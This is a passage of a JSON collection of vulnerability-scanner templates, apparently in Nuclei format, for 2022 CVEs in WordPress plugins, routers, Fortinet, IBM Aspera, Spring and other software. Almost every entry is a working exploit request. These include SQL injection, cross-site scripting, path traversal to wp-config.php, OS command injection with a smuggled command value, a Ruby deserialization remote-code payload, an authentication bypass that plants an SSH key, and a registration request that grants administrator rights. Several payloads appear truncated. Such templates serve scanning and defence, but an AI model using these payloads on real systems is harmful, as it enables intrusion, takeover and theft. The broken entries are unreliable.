boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\">&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" >')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0597","info":{"name":"Microweber < 1.2.11 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=http://oast.pro/"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\">&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n i: x\\n- !ruby/object:Gem::SpecFetcher\\n i: y\\n- !ruby/object:Gem::Requirement\\n requirements:\\n !ruby/object:Gem::Package::TarReader\\n io: &1 !ruby/object:Net::BufferedIO\\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n read: 0\\n header: \\\"pew\\\"\\n debug_output: &1 !ruby/object:Net::WriteAdapter\\n socket: &1 !ruby/object:PrettyPrint\\n output: !ruby/object:Net::WriteAdapter\\n socket: &1 !ruby/module \\\"Kernel\\\"\\n method_id: :eval\\n newline: \\\"throw `id`\\\"\\n buffer: {}\\n group_stack:\\n - !ruby/object:PrettyPrint::Group\\n break: true\\n method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\">')"],"condition":"and"}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email= HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40047","info":{"name":"Flatpress < v1.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}\n\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundary{{randstring}}\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundary{{randstring}}--\n","GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"flatpress\")","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","PHP Version <\\/td>([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"regex","regex":["^1331' and sleep\\(7\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["p1_network_mail.cgi"]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0591","info":{"name":"Formcraft3 <3.8.28 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/formcraft3/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: WordPress"]}]}]},{"id":"CVE-2022-32772","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertInfo(\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3242","info":{"name":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\") && contains(tolower(body), \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4049","info":{"name":"WP User <= 7.0 - Unauthenticated SQLi","severity":"critical"},"requests":[{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)\n"],"attack":"clusterbomb","payloads":{"path":["/index.php/user/","/user"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header_2, \"text/html\")","contains(body_2, 'Invalid Access')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"wpuser_update_setting\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-44948","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-22965","info":{"name":"Spring - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}} HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\nclass.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n","GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n"],"payloads":{"interact_protocol":["http","https"]},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"],"case-insensitive":true}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site 